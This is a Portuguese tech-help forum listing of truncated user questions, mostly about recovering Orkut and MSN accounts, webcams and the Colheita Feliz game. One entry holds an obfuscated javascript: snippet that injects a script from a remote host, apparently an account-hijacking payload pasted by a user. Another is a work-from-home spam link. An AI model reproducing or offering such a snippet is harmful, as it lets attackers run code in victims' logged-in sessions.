Configuração e problemas de rede de área local, Wi-Fi, roteador, modem, chaves USB
amigas para sempre como faz um orkut
Boa noite, existo outra forma de ficar registrado o historico de navegação?? qdo o historico é apagado, eu consigo visualizar as pag visitadas de um...
Como vou dar comida pra minha cabra se não tenho moedas verdes? Dessa forma ela nunca vai se alimentar? COMO ASSIM.....CRIA UM ANIMAL NOVO E NÃO COLOC...
Bom dia,o meu msn 2009 eu ja baixei pelo site e pelo baixaki mas da erro no aplication erro repoting ja tentei instalar mais de vinte vezes e toda hor...
Bom dia, Eu goqtaria de enviar um email para um grande número de amigos, do quqis eu conheço o enderêço email. Mas gostaria que cada destinatário n...
Bom dia, nao consigo ler meus emails coloco pra entra e da senha ou endereço errado mais nao esta certo o q eu faço
Boa tarde tenho uma web can goldship mais estou usando o windows seve ela não fuciona como eu faço me ajudem!!!
Bom dia, quero saber porque eu abro o msn pelo mozila e quado vou entrar na caixa de entrada ela abre pela internet explorer Configuração: Win...
Bom dia, Já faz algum dias que não consigo entrar no meu msn. Aparece a seguinte mensagem: App Name: msnmsgr.exe App Ver 14.08889.726 AppStam...
Bom dia, oie eu gotaria de recuperar o orkut do meu namorado que foi hakceado!!! me ajudemm por favor... Configuração: Windows XP / Internet E...
Bom dia, no meu msn quando eu chamava, ia a web normal, o convite, agora quando eu chamo vai direto na chamada de video, tem como arrumar isso? ...
Bom dia, trabalheemcasaoverdadeiro.com.br/1375489 Configuração: Windows XP / Internet Explorer 6.0
acho que meu orkut foi raqueado como faço para recuperalo?pelo amor de deus envie uma resposta...
peço ajuda para configurar o meu twitter ate agora nao consegui fazer nada
Bom dia, Não consigo mais entrar no meu orkut, pq trocaram minha senha como faço para recuperar ele ? Configuração: Windows XP / Firefox 3.6....
Bom dia, eu to tentanto criar um msn quando eu acabo e cliko em aceito da erro. oq eu faço? Configuração: Windows XP / Internet Explorer 8.0
Bom dia, meu orkut foi hackeado, e estao usando de forma errada me ajudem por favor Configuração: Windows 7 / Internet Explorer 8.0
sera que alguma pessoa inteligente sabe me dize como eu troco a senha do msn plussssssssssss
Bom dia, não consigo instalar o msn beta 9.0 toda vez q eu tento aparece uma mensagem dizendo q e impossivel instalar por causa de um erro 5 o q faço ...
Configuração: Windows XP / Firefox 3.6.3 javascript:d=document;c=d.createElement(%22script%22);d.body.appendChild(c);c.src=%22ht%22+%22tp:%22+%22//sn%...
Estava usando o msn e gostaria de reativar meus e-mails do hotmail. Como faço?
Mee ajudam achar minah senha perdii a senha a do msn e do orkut presizor urgente desse negoço vlw aii quem puder ² *---*
Bom dia, eu entrei no msn e gravei a senha ,para depois entrar automatico ,maaaaaaaas eu tirei da opçao de gravar e a senha sumiu,agora nao lembro m...
Bom dia, perdi minha senha do meu outro email do msn loh.4600sb@hotmail.com alguem me auda esse email e de serviço e preciso muito dele nao sei ...
olá, boa noite..como q faço p/ recunperar a senha do meu orkut. eu aceeso o email certo e ñ consigo entrar com as senhas q digito... ñ consigo le...
tenho o endereço e a senha do meu orkut,porem não consigo abri-lo.quando tento diz que o nome e endereço está errado mas tenho certeza que estão corre...
minha prima hackeou meu orkut e o hotmail,como faço pra conseguir de volta os dois
gostaria de ajuda pra recuperar minha sena , não concigo acessar meu orkut da bol Configuração: Windows XP / Internet Explorer 7.0
Configuração: Windows XP / Firefox 3.6.3 como acessar meu orkut passo a passo se esquessi minha senha]? porq esse tal de redefinir minha senha ...
Perdi minha senha e não tenho mais o imail alternativo e ñ lembro a palavra secreta. Gostaria muito de obeter ajuda, pois minha conta continua valend...
Bom dia,entrei num tal de bbb9 e meu orkut nao abriu mais que faço
entraram no meu e-mail e mudaram-me a password. já fiz um novo mas preciso dos contactos. dá para me enviarem a password do meu mail? É pafmoreira@hot...
o que eu dô para a minha cabra no colheita feliz?
Bom dia, nao consigo acessasr minha email
comprei osso pra cabra do colheita feliz e na hora q fui alimentar falou q aqla comida não era adequada para a cabra, sei q tem aqla outra comida, só ...
Configuração: Windows XP / Internet Explorer 8.0 ola por gentileza nao me lembro da minha senha e nem do login do meu orkut e nao consigo acessar.......
tenho uma webcan desse modelo cvc2302 e instalei o programa com o cd de instalaçao mas quando conecto a minha webcan no usb da erro dispositivo nao en...
Como Recupera Meu Orkut? Esqueci A Senha
como saber se o meu contacto recebe as minhas mensaguens instantanias estando sempre ofllai ne Configuração: Windows XP / Safari 532.5
Bom dia, meu nome é patricia anchieta, ha 2 dias atraz tento entrar em minha conta do facebook, mas sempre diz que esta desativada, eu gostaria de sa...
Oi será que alguém poderia me ajudar ?? meu MSN não quer mais conectar no meu pc , quando acesso ele só aparece o contorno da janela do Msn daí apar...
Configuração: Windows XP / Internet Explorer 7.0 esqueci minha senha , fui trocar e esqueci . porfavor me ajuda e urgenti ='( Obrigado:jenyffer
Nao consigo acessar o orkut pois a internet diz q a pagina esta anulada....o Q faço p conseguir acessar a pagina?
que disgraça cara eu tbm quero entrar no bate papo mais so dar a mesma disgraça é porrisso que essa peste de orkut é uma miseria viu cara resolvi esse...
Gostaria de saber se posso abrir o aplicativo "colheita feliz" em outro site, sem ser o orkut?
por favor meajudem naõ consigo redefinir minha senha....meu end alternativo e o mesmo esqueci a peguta secreta....ja estou tentadoa varios dias...
quando eu entro no orkut /nao aparece pra eu colocar usuário e senha/ mas eu quero é entrar no outro orkut pelo mesmo computador
não lembro a senha do msn, nem a pergunta secreta, também não consigo entrar com um id diferente. O que eu faço? Configuração: Windows Vista / Intern...
Bom dia, eu não sei beijar tenho que aprender pra não fazer feio uma dica por favor??
qdo abro a tela msn, não aprece a opção da segunda conta, alguém conhece do assunto